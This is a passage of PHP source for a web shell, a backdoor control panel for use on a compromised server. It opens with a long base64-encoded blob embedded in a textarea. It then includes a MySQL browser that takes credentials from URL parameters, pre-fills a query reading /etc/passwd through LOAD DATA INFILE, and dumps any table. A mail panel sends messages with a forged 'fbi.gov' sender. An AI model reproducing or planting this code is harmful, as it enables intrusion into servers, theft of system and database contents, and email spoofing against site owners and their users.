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'))); ?></textarea>
  840. </td>
  841. </tr>
  842. <tr>
  843. <td>
  844.                         <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" />
  845.                             </td>
  846.                 </tr>
  847.             </table>
  848.             </form>
  849.             <?php
  850.                 }
  851.         elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql'))
  852.                 {
  853.                     if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport']))
  854.                             {
  855.                             $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport'];    
  856.                             if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass))
  857.                                 {
  858.                                 $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
  859.                                 $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
  860.                                 $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;
  861.                                 sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  862.                                 sqlpass=".$sqlpass."&amp;
  863.                                 sqlport=".$sqlport."&amp;\">[ databases ]</a>";
  864.                                 if(isset($_GET['db']))
  865.                                     $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;
  866.                                     <a href=\"y=".$pwd."&amp;x=mysql&amp;
  867.                                     sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  868.                                     sqlpass=".$sqlpass."&amp;
  869.                                     sqlport=".$sqlport."&amp;
  870.                                     db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
  871.                                 if(isset($_GET['table']))
  872.                                     $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;
  873.                                     </span>&nbsp;&nbsp;
  874.                                     <a href=\"y=".$pwd."&amp;x=mysql&amp;
  875.                                     sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  876.                                     sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;
  877.                                     db=".$_GET['db']."&amp;
  878.                                     table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
  879.                                     $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
  880.                                     $msg .= "</div>";
  881.                                     echo $msg;
  882.                                 if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery'])))
  883.                             {
  884.                             $db = $_GET['db'];
  885.                                     $query = "DROP TABLE IF EXISTS Newbie3viLc063s0_table;
  886.                                     \nCREATE TABLE `Newbie3viLc063s0_table` ( `file` LONGBLOB NOT NULL );
  887.                                     \nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE Z3r0Z3r0_table;SELECT * FROM Newbie3viLc063s0_table;
  888.                                     \nDROP TABLE IF EXISTS Newbie3viLc063s0_table;";
  889.                                     $msg = "<div style=\"width:99%;padding:0 10px;\">
  890.                                     <form action=\"?\" method=\"get\">
  891.                                         <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  892.                                         <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  893.                                         <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  894.                                         <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  895.                                         <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  896.                                         <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  897.                                         <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  898.                                         <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p>
  899.                                         <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  900.                                     </form>
  901.                                 </div> ";
  902.                                         $tables = array();
  903.                                         $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>";
  904.                                         $hasil = @mysql_list_tables($db,$con);
  905.                             while(list($table) = @mysql_fetch_row($hasil))
  906.                                 { @array_push($tables,$table); }
  907.                             @sort($tables);
  908.                             foreach($tables as $table)
  909.                                 {
  910.                                 $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></tr>";
  911.                                 }
  912.                             $msg .= "</table>";
  913.                             }
  914.                         elseif(isset($_GET['table']) && (!isset($_GET['sqlquery'])))
  915.                             {
  916.                             $db = $_GET['db'];
  917.                             $table = $_GET['table'];
  918.                             $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";
  919.                             $msgq = "<div style=\"width:99%;padding:0 10px;\">
  920.                                     <form action=\"?\" method=\"get\">
  921.                                         <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  922.                                         <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  923.                                         <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  924.                                         <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  925.                                         <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  926.                                         <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  927.                                         <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  928.                                         <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  929.                                         <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  930.                                         <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  931.                                     </form>
  932.                                 </div> ";
  933.                             $columns = array();
  934.                             $msg = "<table class=\"explore\" style=\"width:99%;\">";
  935.                             $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);
  936.                             while(list($column) = @mysql_fetch_row($hasil))
  937.                                 {
  938.                                 $msg .= "<th>$column</th>"; $kolum = $column;
  939.                                 }
  940.                             $msg .= "</tr>";
  941.                             $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
  942.                             list($total) = mysql_fetch_row($hasil);
  943.                             if(isset($_GET['z'])) $page = (int) $_GET['z'];
  944.                             else $page = 1;
  945.                             $pagenum = 100;
  946.                             $totpage = ceil($total / $pagenum);
  947.                             $start = (($page - 1) * $pagenum);
  948.                             $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
  949.                             while($datas = @mysql_fetch_assoc($hasil))
  950.                                 {
  951.                                 $msg .= "<tr>";
  952.                                 foreach($datas as $data){ if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; }
  953.                                 $msg .= "</tr>";
  954.                                 }
  955.                             $msg .= "</table>";
  956.                             $head = "<div style=\"padding:10px 0 0 6px;\">
  957.                                     <form action=\"?\" method=\"get\">
  958.                                         <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  959.                                         <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  960.                                         <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  961.                                         <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  962.                                         <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  963.                                         <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  964.                                         <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  965.                                         <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  966.                                         Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
  967.                             for($i = 1;$i <= $totpage;$i++)
  968.                                 {
  969.                                 $head .= "<option value=\"".$i."\">".$i."</option>";
  970.                                 if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>";
  971.                                 }
  972.                             $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>";
  973.                             $msg = $msgq.$head.$msg;
  974.                         }
  975.                     elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != ""))
  976.                         {
  977.                         $db = $_GET['db'];
  978.                         $query = magicboom($_GET['sqlquery']);
  979.                         $msg = "<div style=\"width:99%;padding:0 10px;\">
  980.                                 <form action=\"?\" method=\"get\">
  981.                                     <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  982.                                     <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  983.                                     <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  984.                                     <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  985.                                     <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  986.                                     <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  987.                                     <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  988.                                     <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  989.                                     <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  990.                                 </form>
  991.                             </div> ";
  992.                         @mysql_select_db($db);
  993.                         $querys = explode(";",$query);
  994.                         foreach($querys as $query)
  995.                             {
  996.                             if(trim($query) != "")
  997.                                 {
  998.                                 $hasil = mysql_query($query);
  999.                                 if($hasil)
  1000.                                     {
  1001.                                     $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
  1002.                                         <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>";
  1003.                                     $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>";
  1004.                                     for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";
  1005.                                     $msg .= "</tr>";
  1006.                                     for($i=0;$i<@mysql_num_rows($hasil);$i++)
  1007.                                         {
  1008.                                         $rows=@mysql_fetch_array($hasil);
  1009.                                         $msg .= "<tr>";
  1010.                                         for($j=0;$j<@mysql_num_fields($hasil);$j++)
  1011.                                             {
  1012.                                             if($rows[$j] == "") $dataz = "&nbsp;";
  1013.                                             else $dataz = $rows[$j];
  1014.                                             $msg .= "<td>".$dataz."</td>";
  1015.                                             }
  1016.                                         $msg .= "</tr>";
  1017.                                         }
  1018.                                     $msg .= "</table>";
  1019.                                     }
  1020.                                 else
  1021.                                     $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
  1022.                                 }
  1023.                             }
  1024.                         }
  1025.                     else
  1026.                         {
  1027.                         $query = "SHOW PROCESSLIST;\n
  1028.                             SHOW VARIABLES;\n
  1029.                             SHOW STATUS;";
  1030.                         $msg = "<div style=\"width:99%;padding:0 10px;\">
  1031.                             <form action=\"?\" method=\"get\">
  1032.                                 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  1033.                                 <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  1034.                                 <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  1035.                                 <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  1036.                                 <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  1037.                                 <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  1038.                                 <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  1039.                                 <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  1040.                                 <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  1041.                             </form>
  1042.                             </div> ";
  1043.                         $dbs = array();
  1044.                         $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
  1045.                         $hasil = @mysql_list_dbs($con);
  1046.                         while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); }
  1047.                         @sort($dbs);
  1048.                         foreach($dbs as $db)
  1049.                             {
  1050.                             $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>";
  1051.                             }
  1052.                         $msg .= "</table>";
  1053.                         }
  1054.                     @mysql_close($con);
  1055.                     }
  1056.                 else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>";
  1057.                 echo $msg;
  1058.                 }
  1059.             else
  1060.                 {
  1061.                 ?>
  1062.                 <form action="?" method="get">
  1063.                 <input type="hidden" name="y" value="<?php echo $pwd; ?>" />
  1064.                 <input type="hidden" name="x" value="mysql" />
  1065.                 <table class="tabnet" style="width:300px;">
  1066.                     <tr>
  1067.                         <th colspan="2">Connect to mySQL server</th>
  1068.                     </tr>
  1069.                     <tr>
  1070.                         <td>&nbsp;&nbsp;Host</td>
  1071.                         <td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td>
  1072.                     </tr>
  1073.                     <tr>
  1074.                         <td>&nbsp;&nbsp;Username</td>
  1075.                         <td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td>
  1076.                     </tr>
  1077.                     <tr>
  1078.                         <td>&nbsp;&nbsp;Password</td>
  1079.                         <td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td>
  1080.                     </tr>
  1081.                     <tr>
  1082.                         <td>&nbsp;&nbsp;Port</td>
  1083.                         <td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td>
  1084.                     </tr>
  1085.                 </table>
  1086.                 </form>
  1087.                 <?php
  1088.                 }
  1089.             }
  1090.         elseif(isset($_GET['x']) && ($_GET['x'] == 'mail'))
  1091.             {
  1092.             if(isset($_POST['mail_send']))
  1093.                 {
  1094.                 $mail_to = $_POST['mail_to'];
  1095.                 $mail_from = $_POST['mail_from'];
  1096.                 $mail_subject = $_POST['mail_subject'];
  1097.                 $mail_content = magicboom($_POST['mail_content']);
  1098.                 if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from"))
  1099.                     { $msg = "email sent to $mail_to"; }
  1100.                 else $msg = "send email failed";
  1101.                 }
  1102.             ?>
  1103.             <form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post">
  1104.                 <table class="cmdbox">
  1105.                     <tr>
  1106.                         <td>
  1107.                             <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey admin, please patch your site :)</textarea>
  1108.                         </td>
  1109.                     </tr>
  1110.                     <tr>
  1111.                         <td>
  1112.                             &nbsp;<input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" />&nbsp; mail to
  1113.                         </td>
  1114.                     </tr>
  1115.                     <tr>
  1116.                         <td>   
  1117.                             &nbsp;<input class="inputz" style="width:20%;" type="text" value="Newbie3viLc063s0@fbi.gov" name="mail_from" />
  1118.                             &nbsp; from
  1119.                         </td>
  1120.                     </tr>
  1121.                     <tr>
  1122.                         <td>
  1123.                             &nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject
  1124.                         </td>
  1125.                     </tr>
  1126.                     <tr>
  1127.                         <td>
  1128.                             &nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" />
  1129.                         </td>
  1130.                     </tr>
  1131.                     <tr>
